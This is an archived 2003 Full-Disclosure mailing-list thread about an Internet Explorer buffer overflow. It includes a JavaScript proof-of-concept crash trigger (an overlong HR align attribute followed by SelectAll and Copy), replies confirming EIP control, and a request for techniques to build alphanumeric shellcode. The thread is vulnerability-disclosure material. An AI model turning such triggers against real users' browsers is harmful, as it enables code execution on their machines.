lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <000801c33b3d$0b27afe0$0100a8c0@ark>
From: rikul at bellsouth.net (Rick)
Subject: Re: Internet Explorer >=5.0 : Buffer overflow

I got as far as having it jmp to shellcode with byte range 0x20 to 0x7f
I suppose if you have enough space these should be sufficient to create
self modifying shellcode which does something important. Does anyone
know good papers or resource for something like that? 

- Rick Patel


-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of SecurITeam
BugTraq Monitoring
Sent: Wednesday, June 25, 2003 5:05 AM
To: KF; Digital Scream
Cc: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] Re: Internet Explorer >=5.0 : Buffer overflow

Hi,

I can confirm it under Windows 2000 with IE 5.50.4807.2300

Full control over the EIP, but the shellcode cannot contain (as it
currently
appears) non Alpha Numeric characters, too bad I guess.

Thanks
Noam Rathaus
CTO
Beyond Security Ltd
http://www.SecurITeam.com
http://www.BeyondSecurity.com
----- Original Message -----
From: "KF" <dotslash@...soft.com>
To: "Digital Scream" <digitalscream@...l.xakep.ru>
Sent: Monday, June 23, 2003 6:43 PM
Subject: Re: Internet Explorer >=5.0 : Buffer overflow


> I can confirm this on Windows XP Professional
>
> version 6.0.2800.1106.xpsp2-030422-1633
>
> 0x43534c41 refrenced mem at 0x43534c41
> -KF
>
>
> Digital Scream wrote:
>
> >&lt;script&gt;
> > wnd=open("about:blank","","");
> > wnd.moveTo(screen.Width,screen.Height);
> > WndDoc=wnd.document;
> > WndDoc.open();
> > WndDoc.clear();
> > buffer="";
> > for(i=1;i<=127;i++)buffer+="X";
> > buffer+="DigitalScream";
> > WndDoc.write("<HR align='"+buffer+"'>");
> > WndDoc.execCommand("SelectAll");
> > WndDoc.execCommand("Copy");
> > wnd.close();
> >&lt;/script&gt;
> >
> >Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew
> >
> >
> >
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ